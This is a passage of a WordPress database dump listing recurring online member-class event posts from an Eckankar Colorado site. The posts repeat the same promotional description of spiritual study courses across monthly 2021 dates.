you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way','','','2020-12-09 10:55:36','2020-12-09 17:55:36','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262814',0,'tribe_events','',0),(262816,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-01-10','','','2020-12-09 10:55:36','2020-12-09 17:55:36','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-10#038;p=262814',0,'tribe_events','',0),(262817,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-02-14','','','2020-12-09 10:55:36','2020-12-09 17:55:36','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-14#038;p=262814',0,'tribe_events','',0),(262818,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-03-14','','','2020-12-09 10:55:37','2020-12-09 17:55:37','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-14#038;p=262814',0,'tribe_events','',0),(262819,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-04-11','','','2020-12-09 10:55:37','2020-12-09 17:55:37','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-11#038;p=262814',0,'tribe_events','',0),(262820,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-05-09','','','2020-12-09 10:55:37','2020-12-09 17:55:37','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-09#038;p=262814',0,'tribe_events','',0),(262821,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-06-13','','','2020-12-09 10:55:37','2020-12-09 17:55:37','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-13#038;p=262814',0,'tribe_events','',0),(262822,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-07-11','','','2020-12-09 10:55:37','2020-12-09 17:55:37','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-11#038;p=262814',0,'tribe_events','',0),(262823,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-08-08','','','2020-12-09 10:55:37','2020-12-09 17:55:37','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-08#038;p=262814',0,'tribe_events','',0),(262824,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-09-12','','','2020-12-09 10:55:37','2020-12-09 17:55:37','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-12#038;p=262814',0,'tribe_events','',0),(262825,2,'2020-12-09 10:54:31','2020-12-09 17:54:31','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The Secret Way\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The Secret Way','','publish','closed','closed','','online-member-class-the-secret-way-2021-10-10','','','2020-12-09 10:55:37','2020-12-09 17:55:37','',262814,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-10#038;p=262814',0,'tribe_events','',0),(262857,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series','','','2020-12-09 11:34:18','2020-12-09 18:34:18','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262857',0,'tribe_events','',0),(262859,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-01-03','','','2020-12-09 11:34:18','2020-12-09 18:34:18','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-03#038;p=262857',0,'tribe_events','',0),(262860,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-02-07','','','2020-12-09 11:34:19','2020-12-09 18:34:19','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-07#038;p=262857',0,'tribe_events','',0),(262861,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-03-07','','','2020-12-09 11:34:19','2020-12-09 18:34:19','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-07#038;p=262857',0,'tribe_events','',0),(262862,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-04-04','','','2020-12-09 11:34:19','2020-12-09 18:34:19','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-04#038;p=262857',0,'tribe_events','',0),(262863,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-05-02','','','2020-12-09 11:34:19','2020-12-09 18:34:19','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-02#038;p=262857',0,'tribe_events','',0),(262864,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-06-06','','','2020-12-09 11:34:19','2020-12-09 18:34:19','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-06#038;p=262857',0,'tribe_events','',0),(262865,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-07-04','','','2020-12-09 11:34:19','2020-12-09 18:34:19','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-04#038;p=262857',0,'tribe_events','',0),(262866,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-08-01','','','2020-12-09 11:34:19','2020-12-09 18:34:19','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-01#038;p=262857',0,'tribe_events','',0),(262867,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-09-05','','','2020-12-09 11:34:20','2020-12-09 18:34:20','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-05#038;p=262857',0,'tribe_events','',0),(262868,2,'2020-12-09 11:01:58','2020-12-09 18:01:58','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – First Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br 